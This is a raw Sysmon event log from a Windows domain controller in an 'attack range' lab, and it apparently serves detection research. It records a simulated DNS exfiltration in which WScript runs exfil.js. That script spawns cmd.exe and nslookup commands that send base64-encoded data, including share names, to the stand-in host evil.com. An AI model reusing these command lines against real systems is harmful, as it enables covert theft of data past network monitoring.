14:21:29.212{2E1864BB-18E9-629A-4543-000000005F02}48485836C:\Windows\system32\cmd.exe{2E1864BB-18E9-629A-4743-000000005F02}3552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.227{2E1864BB-18E9-629A-4743-000000005F02}3552C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E9-629A-4543-000000005F02}4848C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqzwwf.tmp 2>&1 10341000x8000000000000000208085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.212{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-4643-000000005F02}4052C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.196{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-4643-000000005F02}4052C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.196{2E1864BB-18E9-629A-4643-000000005F02}40525364C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-4543-000000005F02}4848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.196{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-4643-000000005F02}4052C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.181{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.181{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.181{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.181{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.181{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-4543-000000005F02}4848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.181{2E1864BB-18E0-629A-6742-000000005F02}39762328C:\Windows\System32\WScript.exe{2E1864BB-18E9-629A-4543-000000005F02}4848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.193{2E1864BB-18E9-629A-4543-000000005F02}4848C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqzwwf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.181{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlefhza.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.159{2E1864BB-18E9-629A-4343-000000005F02}66727288C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-4443-000000005F02}4288C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.159{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-4443-000000005F02}4288C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.159{2E1864BB-18E9-629A-4243-000000005F02}50447576C:\Windows\system32\cmd.exe{2E1864BB-18E9-629A-4443-000000005F02}4288C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.162{2E1864BB-18E9-629A-4443-000000005F02}4288C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E9-629A-4243-000000005F02}5044C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlefhza.tmp 2>&1 10341000x8000000000000000208065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.143{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-4343-000000005F02}6672C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.143{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-4343-000000005F02}6672C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.128{2E1864BB-18E9-629A-4343-000000005F02}66727288C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-4243-000000005F02}5044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000208062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.699{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61024-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000208061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.698{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61024-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000208060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.698{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50590- 354300x8000000000000000208059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.697{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50589- 354300x8000000000000000208058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.696{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50588- 354300x8000000000000000208057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.626{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62806-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000208056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.623{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62806-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000208055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.623{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50587- 354300x8000000000000000208054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.622{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50586- 354300x8000000000000000208053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.622{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50585- 354300x8000000000000000208052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.555{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local60939-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000208051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.553{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local60939-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000208050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.553{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50584- 354300x8000000000000000208049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.553{00000000-0000-0000-0000-000000000000}7036<unknown process>-udptruefalse127.0.0.1-50584-false127.0.0.1-53domain 354300x8000000000000000208048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.553{00000000-0000-0000-0000-000000000000}7036<unknown process>-udpfalsefalse127.0.0.1-50583-false127.0.0.1-53domain 354300x8000000000000000208047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.553{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50583- 354300x8000000000000000208046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.553{00000000-0000-0000-0000-000000000000}7036<unknown process>-udptruefalse127.0.0.1-50583-false127.0.0.1-53domain 354300x8000000000000000208045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.553{00000000-0000-0000-0000-000000000000}7036<unknown process>-udpfalsefalse127.0.0.1-50582-false127.0.0.1-53domain 354300x8000000000000000208044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.552{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50582- 354300x8000000000000000208043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.552{00000000-0000-0000-0000-000000000000}7036<unknown process>-udptruefalse127.0.0.1-50582-false127.0.0.1-53domain 354300x8000000000000000208042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.435{00000000-0000-0000-0000-000000000000}8040<unknown process>-udpfalsefalse127.0.0.1-50581-false127.0.0.1-53domain 354300x8000000000000000208041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.435{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50581- 354300x8000000000000000208040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 